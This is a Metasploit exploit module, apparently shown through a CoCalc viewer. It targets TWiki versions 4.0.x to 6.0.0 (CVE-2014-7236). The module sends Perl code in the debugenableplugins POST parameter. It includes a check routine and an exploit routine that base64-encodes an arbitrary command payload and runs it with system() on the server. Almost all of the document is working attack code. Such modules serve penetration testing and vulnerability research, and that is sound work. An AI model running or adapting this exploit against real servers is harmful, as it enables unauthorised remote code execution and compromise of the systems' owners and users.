CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name' => 'TWiki Debugenableplugins Remote Code Execution',
14
      'Description' => %q{
15
        TWiki 4.0.x-6.0.0  contains a vulnerability in the Debug functionality.
16
        The value of the debugenableplugins parameter is used without proper sanitization
17
        in an Perl eval statement which allows remote code execution.
18
      },
19
      'Author' =>
20
        [
21
          'Netanel Rubin', # from Check Point - Discovery
22
          'h0ng10', # Metasploit Module
23

24
        ],
25
      'License' => MSF_LICENSE,
26
      'References' =>
27
        [
28
          [ 'CVE', '2014-7236'],
29
          [ 'OSVDB', '112977'],
30
          [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236']
31
        ],
32
      'Privileged' => false,
33
      'Targets' =>
34
        [
35
          [ 'Automatic',
36
            {
37
              'Payload'        =>
38
                {
39
                  'BadChars' => "",
40
                  'Compat'      =>
41
                    {
42
                      'PayloadType' => 'cmd',
43
                      'RequiredCmd' => 'generic perl python php',
44
                    }
45
                },
46
              'Platform' => ['unix'],
47
              'Arch' => ARCH_CMD
48
            }
49
          ]
50
        ],
51
      'DefaultTarget'  => 0,
52
      'DisclosureDate' => '2014-10-09'))
53

54
    register_options(
55
      [
56
        OptString.new('TARGETURI', [ true, "TWiki path", '/do/view/Main/WebHome' ]),
57
        OptString.new('PLUGIN', [true, "A existing TWiki Plugin", 'BackupRestorePlugin'])
58
      ])
59
  end
60

61

62
  def send_code(perl_code)
63
    uri = target_uri.path
64
    data = "debugenableplugins=#{datastore['PLUGIN']}%3b" + CGI.escape(perl_code) + "%3bexit"
65

66
    res = send_request_cgi!({
67
      'method' => 'POST',
68
      'uri' => uri,
69
      'data' => data
70
    })
71

72
    return res
73
  end
74

75

76
  def check
77
    rand_1 = rand_text_alpha(5)
78
    rand_2 = rand_text_alpha(5)
79

80
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n#{rand_1}\".\"#{rand_2}\")"
81
    res = send_code(code)
82

83
    if res and res.code == 200
84
      return CheckCode::Vulnerable if res.body == rand_1 + rand_2
85
    end
86
    CheckCode::Unknown
87
  end
88

89

90
  def exploit
91
    code = "print(\"Content-Type:text/html\\r\\n\\r\\n\");"
92
    code += "require('MIME/Base64.pm');MIME::Base64->import();"
93
    code += "system(decode_base64('#{Rex::Text.encode_base64(payload.encoded)}'));exit"
94
    res = send_code(code)
95
    handler
96

97
  end
98
end
99

100